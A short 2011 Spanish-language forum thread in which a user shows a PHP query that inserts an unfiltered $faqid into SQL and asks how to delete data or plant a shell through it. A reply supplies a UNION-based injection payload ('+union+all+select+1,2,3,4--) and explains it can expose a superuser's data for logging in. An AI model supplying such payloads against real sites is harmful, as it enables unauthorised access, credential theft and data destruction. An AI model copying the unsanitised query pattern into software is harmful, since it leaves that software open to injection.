SQL injection, obtener mas informacion o borrara datos

Iniciado por xalupeao, 7 Marzo 2011, 09:29 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

xalupeao

7 Marzo 2011, 09:29 AM
Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código [Seleccionar]
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código [Seleccionar]
if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.
Silverhost Hosting Chile - La empresa lider de Hosting en Chile .

Shell Root

#1
7 Marzo 2011, 18:31 PM
Te encuentras en frente de una iSQL básica. Es sólo cuestión de inyectarle código para printear los datos de un super usuario, y así logguearte dentro de la aplicación. En este caso sería algo como,
Código (sql) [Seleccionar]
#
SELECT question, answer, lasteditedby, lastedit
 FROM faq
WHERE id=''+union+all+select+1,2,3,4--'
#

La inyección sería,
Código (sql) [Seleccionar]
'+union+all+select+1,2,3,4--

Tienes que leer tutoriales :D
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario